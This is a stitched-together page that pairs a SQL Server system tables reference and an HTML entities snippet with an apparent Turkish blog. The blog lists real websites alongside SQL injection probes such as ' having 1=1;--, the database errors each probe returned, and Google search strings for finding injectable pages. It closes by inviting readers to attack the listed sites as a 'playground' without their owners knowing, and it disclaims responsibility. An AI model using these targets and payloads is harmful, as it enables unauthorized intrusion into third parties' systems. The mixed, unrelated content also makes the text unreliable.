System Tables (T-SQL)
The information used by Microsoft® SQL Server™ and its components are stored in special tables known as system tables.
Note System tables should not be altered directly by any user. For example, do not attempt to modify system tables with DELETE, UPDATE, or INSERT statements, or user-defined triggers.
Applications should not be written to query the system tables directly. Applications should instead use any of these components to retrieve information stored in the system tables:
Information schema views
System stored procedures
Transact-SQL statements and functions
SQL-DMO
Database application programming interfaces (API) catalog functions
These components constitute a published API for obtaining system information from SQL Server. Microsoft maintains the compatibility of these components from release to release. The format of the system tables is dependent upon the internal architecture of SQL Server and may change from release to release. Therefore, applications that directly access the system tables may have to be changed before they can access a later version of SQL Server.
System Tables in the master Database Only
These tables store server-level system information.
sysaltfiles
sysdevices
sysoledbusers
syscacheobjects
syslanguages
sysperfinfo
syscharsets
syslockinfo
sysprocesses
sysconfigures
syslogins
sysremotelogins
syscurconfigs
sysmessages
sysservers
sysdatabases


System Tables in Every Database
These tables store database-level system information for each database.
sysallocations
sysfiles
sysobjects
syscolumns
sysforeignkeys
syspermissions
syscomments
sysfulltextcatalogs
sysprotects
sysconstraints
sysindexes
sysreferences
sysdepends
sysindexkeys
systypes
sysfilegroups
sysmembers
sysusers
SQL Server Agent Tables in the msdb Database
These tables store information used by SQL Server Agent.
sysalerts
sysjobschedules
systargetservergroupmembers
syscategories
sysjobservers
systargetservergroups
sysdownloadlist
sysjobsteps
systargetservers
sysjobhistory
sysnotifications
systaskids
sysjobs
sysoperators

Tables in the msdb Database
These tables store information used by database backup and restore operations.
backupfile
backupset
restorefilegroup
backupmediafamily
restorefile
restorehistory
backupmediaset


Tables Used to Store Replication Information
These tables are used by replication and stored in the master database.
sysarticles
syspublications
sysservers
sysdatabases
sysreplicationalerts
syssubscriptions
sysobjects


These tables are used by replication and stored in the distribution database.
MSagent_parameters
MSmerge_agents
Msrepl_originators
MSagent_profiles
MSmerge_history
MSrepl_transactions
MSarticles
MSmerge_subscriptions
MSrepl_version
MSdistpublishers
MSpublication_access
MSsnapshot_agents
MSdistributiondbs
Mspublications
MSsnapshot_history
MSdistribution_agents
Mspublisher_databases
MSsubscriber_info
MSdistribution_history
MSreplication_objects
MSsubscriber_schedule
MSdistributor
MSreplication_subscriptions
MSsubscriptions
MSlogreader_agents
MSrepl_commands
MSsubscription_properties
MSlogreader_history
MSrepl_errors

These tables are used by replication and stored in the user’s database.
MSmerge_contents
MSmerge_tombstone
sysmergeschemachange
MSmerge_delete_conflicts
sysarticleupdates
sysmergesubscriptions
MSmerge_genhistory
sysmergearticles
sysmergesubsetfilters
MSmerge_replinfo
sysmergepublications


(c) 1988-98 Microsoft Corporation. All Rights Reserved.

Advanced Topics on SQL Injection Protection by OWASP

Kurcalarken-Gezerken:Nasa Hacker' ı ile Röportaj

Bugün Ferruh Mavituna'nın günlüğünü okurken oradan onun başka bir yazısına geçtim. Nasa sistemine giren hacker ile ilgili yazısı şurada:http://ferruh.mavituna.com/makale/nasa-hacker-i-ile-roportaj
Ama benim o hacker'dan çok vurgulamak istediğim yazıdaki şurası:

...
Zincir ve zayıf halka teorisinin kuralının en büyük örneklerinden biri
olsa gerek. Eğer yeterince sistemi tararsanız açık
bulabilirsiniz. Zamanında yahoo' da benzer bir şekilde
normalde internette hiç bir yerde bağlantısı olmayan bir iç proxy ile
hacklenmişti.
...

Bence açık bulmak için çok doğru ve yeterli bir yöntem, yeteri kadar sistemi taramak

HTML 4.01 Entities Reference

HTML 4.01 supports the ISO 8859-1 (Latin-1) character set.

The lower part of ISO-8859-1 (codes from 0-127) is the
original 7-BIT ASCII
standard.

Most of these characters can be used without a character reference.

The higher part of ISO-8859-1 (codes from 160-255) can all be used using
character entity names.

Sql sızma( injection) için gerçek siteleri nereden bulacağım?

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

Google araması ile sql test sitesi

http://www.driverara.org/sorudetay.asp?id=4715%27 having 1=1;--

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'soru.cat' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/sorudetay.asp, line 72

Google araması ile sql test sitesi

http://www.prc.gov/dockets.asp?ID=R2006-1'

Sunucu:Oracle
Hata:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Oracle][ODBC][Ora]ORA-01756: quoted string not properly terminated

/dockets.asp, line 41

http://www.trb.org/news/blurb_detail.asp?id=2326'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ',','.

/news/blurb_detail.asp, line 24

Sql sızma denemeleri...
Sql injection

Google araması ile sql test sitesi

id=25013 having 1=1
http://www.aiim.org/standards.asp?id=25013%20having%201=1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'vwwebarticles.ProductID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/GetArticle.asp, line 101

Çözüm

Adres: http://www.xxx.com/default.asp?id=15 having 1=1;--

Hata:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '15 having 1=1;--' to a column of data type int.

/default.asp, line 61

Çözüm:
http://www.xxx.com/default.asp?id=15' having 1=1;--

Kaynak:http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=243810&SiteID=1
Alıntı:

- Syntax error converting the varchar value 'a' to a column of data type int

I have a table(tab1) with a column(col1) of type varchar. I insert a row with an integer value(1). And when i query the table using the sql, select col1 from tab1 where col1 = 1, it works fine.

But after i insert a varchar, say 'a' and then do the same query, i get an error message saying, "Syntax error converting the varchar value 'a' to a column of data type int.". Why is this so? Please reply.

- Try select col1 from tab1 where col1 = '1'
The ' around the 1 tells SQL server it is comparing the charater 1 not the number 1

Google araması ile sql test için site bulma

http://www.google.com.tr/search?q=inurl:"asp?id="

Arama kutusuna inurl:"asp?id=" veya inurl:"php?id=" vs. anahtar ifadeleriyle kendiniz için bir test ortamı sunacak site bulabilirsiniz.
Tabi sitenin sahibinin bu testi sunduğundan haberi olmayacak başka

inurl:"asp?%id%=0..999999"
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22asp%3F%25id%25%3D0..999999

http://www.hayatiminhatasi.com

http://www.hayatiminhatasi.com
Üye giriş ekranında bariz hata var. Biraz kurcaladıktan sonra site sahibine ve üyelerine iletmek gerekli :D

http://www.onlineyayin.net/tv_yayin.asp?id

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-4.0.23a]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/inc_sayac.asp, line 33

http://www.cnbce.com/dizi.asp?ID=3 having 1=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'Serials.SerialID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/dizi.asp, line 13

http://www.teknodijital.com/asp
/listgroup.asp?group=

(union)

http://www.stokburada.com/
index.php?k_id=

http://www.alisverissiteleri.net/
siteler.asp?kategori=

HackBar 1.1.1 Firefox eklentisi

HackBar bir firefox eklentisi, sql ile sitelere sızarken, sizi site adresiyle boşlukları kaldırmaktan, gerekli fonksiyonları aramaktan vs. kurtarıyor. Çok kullanışlı bir eklenti
Bu adresten inceleyebilirsiniz ve indirebilirsiniz.

http://www.alisverissiteleri.net/
alisveris.asp?sid=

Web developer extension

Bu firefox eklentisi çok işe yarıyor: Cookie silmek, düzenlemek, javascripti, meta redirecti engellemek, form detayları, gizli öğeler...
Sayfanın içini dışını gösteriyor düğmeleriyle size.
Ben http://ferruh.mavituna.com/makale/firefox-eklentileri/ Ferruh Mavituna'nın günlüğünde görmüştüm. Kullandım işe yarıyor.

Aman ha, siteyle ilgim yok. Sadece internette ararken buldum.

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

Sql injection

Sql ile uğraşırken google'da arama yapıp, açığı olan siteleri yayınlıyorum. Gerçek hayatta sitelerde hala açıklar var. Bir çeşit canlı deneme ortamı oluşturuyoeum. Siz de bu günlükten yaralanıp, sitelerde kendinizi sınayabilirsiniz sql ile sızma konusunda.

En baştan söyleyeyim bu siteleri test amaçlı bulup yazıyorum. Oyun parkı gibi bir şey yani...

Siteler üstünde dilediğinizi yapmakta serbestsiniz. Sonuçların tüm sorumluluğu, sitelere sızma girişiminde bulunan arkadaşlarındır. Bu siteleri yayınlayan ben de değil.

Hadi Eyvallah,
Kolay gelsin.